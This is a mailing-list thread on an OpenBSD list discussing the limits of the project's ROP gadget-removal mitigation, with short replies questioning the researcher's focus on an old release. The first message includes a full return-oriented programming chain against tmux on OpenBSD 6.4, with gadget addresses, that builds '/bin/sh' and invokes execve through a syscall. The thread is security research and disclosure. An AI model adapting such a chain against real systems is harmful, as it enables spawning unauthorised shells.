You have missed other stuff which matters. Try again.
Nan ZoE <zoen...@gmail.com> wrote: > Because, as far as I understand, these ROP mitigation mechanisms seem to > have been updated only in the three versions of OpenBSD, namely 6.3 to 6.5 > <https://www.openbsd.org/65.html>. Of course, I have also studied some > programs under OpenBSD 6.5, and many of them still seem to have the > potential to be bypassed. > > <f...@disciples.com> 于2023年9月22日周五 12:02写道: > > > Why are you targeting 6.4? That was released in 2018. So, that's 5 years > > and 9 releases since then and another one is happening soon. > > > > > > > > > > Sent: Thursday, September 21, 2023 at 8:50 AM > > From: "Nan ZoE" <zoen...@gmail.com> > > To: misc@openbsd.org > > Subject: ROP Exploitation in openbsd-64 Programs After Removing ROP Gadgets > > Hello, > > > > > > > > I have read your paper regarding the ROP mitigation mechanism (Removing ROP > > Gadgets from OpenBSD), and I find the defense against ROP quite ingenious. > > The paper introduces the bytecode for 'ret' as '\xc3,' and its association > > with the use of the 'rbx' register was a surprising revelation. > > Subsequently, you adjusted the prioritization of the 'rbx' register during > > compilation, effectively filtering out a significant number of 'ret'-ending > > gadgets. This especially removed many misaligned 'ret'-ending gadgets, and > > this technique has been applied to openbsd-63, 64, and 65. While the number > > of 'ret'-ending gadgets has been significantly reduced, there are still > > numerous 'call'-ending gadgets in the program. Security researchers can > > still employ many 'call'-ending gadgets to carry out ROP attacks. Even in > > programs of only a few hundred kilobytes, I have found that we can still > > invoke the execve("/bin/sh", 0, 0) function using only the available > > gadgets in the program, albeit it may require a combination of multiple > > gadgets and some effort to achieve. I am curious if there are any further > > ROP mitigation measures to address this issue? Additionally, I have > > provided an ROP attack example targeting the tmux program in OpenBSD-64, as > > shown below. > > > > > > > > payload = p64(0x4017ce) > > > > #0x00000000004017ce: pop r13; pop r14; pop r15; ret; > > > > payload += p64(0x68732f6e69622f)+p64(0x0)+p64(0x0)+p64(0x40125d) > > > > # 0x000000000040125d: pop rbp; ret; > > > > payload += p64(0x4017d1)+p64(0x403dd3) > > > > # 0x0000000000403dd3: xchg eax, ebp; ret; > > > > payload += p64(0x412208) > > > > # 0x0000000000412208: mov rcx, r13; call rax; > > > > payload += b'' > > > > # 0x00000000004017d1: pop rsi; pop r15; ret; > > > > payload += p64(0x0)+p64(0x40125d) > > > > # 0x000000000040125d: pop rbp; ret; > > > > payload += p64(0x40125d)+p64(0x403dd3) > > > > # 0x0000000000403dd3: xchg eax, ebp; ret; > > > > payload += p64(0x427a31) > > > > # 0x0000000000427a31: pop rbx; pop rbp; jmp rax; > > > > payload += p64(0x49e0ed)+p64(0x0) > > > > # 0x000000000040125d: pop rbp; ret; > > > > payload += p64(0x4017d1)+p64(0x403dd3) > > > > # 0x0000000000403dd3: xchg eax, ebp; ret; > > > > payload += p64(0x412053) > > > > # 0x0000000000412053: mov r8, rbx; call rax; > > > > payload += b'' > > > > # 0x00000000004017d1: pop rsi; pop r15; ret; > > > > payload += p64(0x0)+p64(0x4551d9) > > > > # 0x00000000004551d9: add qword ptr [r8 - 0x7d], rcx; ret; > > > > payload += p64(0x4017d3) > > > > # 0x00000000004017d3: pop rdi; ret; > > > > payload += p64(0x49e070)+p64(0x40d571) > > > > # 0x000000000040d571: pop rsi; ret; > > > > payload += p64(0x0)+p64(0x4017cf) > > > > # 0x00000000004017cf: pop rbp; pop r14; pop r15; ret; > > > > payload += p64(0x0)+p64(0x4017d0)+p64(0x0)+p64(0x40125d) > > > > # 0x000000000040125d: pop rbp; ret; > > > > payload += p64(0x49e1d0)+p64(0x42d80b) > > > > # 0x000000000042d80b: mov rdx, r15; mov rcx, qword ptr [rbp - 0x40]; mov > > rax, r14; call rax; > > > > payload += b'' > > > > # 0x00000000004017d0: pop r14; pop r15; ret; > > > > payload += p64(0x0)+p64(0x40125d) > > > > # 0x000000000040125d: pop rbp; ret; > > > > payload += p64(0x3b)+p64(0x403dd3) > > > > # 0x0000000000403dd3: xchg eax, ebp; ret; > > > > payload += p64(0x407fae) > > > > # 0x0000000000407fae: syscall; > > > > payload += b'' > > > > > > > > Best regards, > > > > ZoE > > > > 2023.09.21 > >
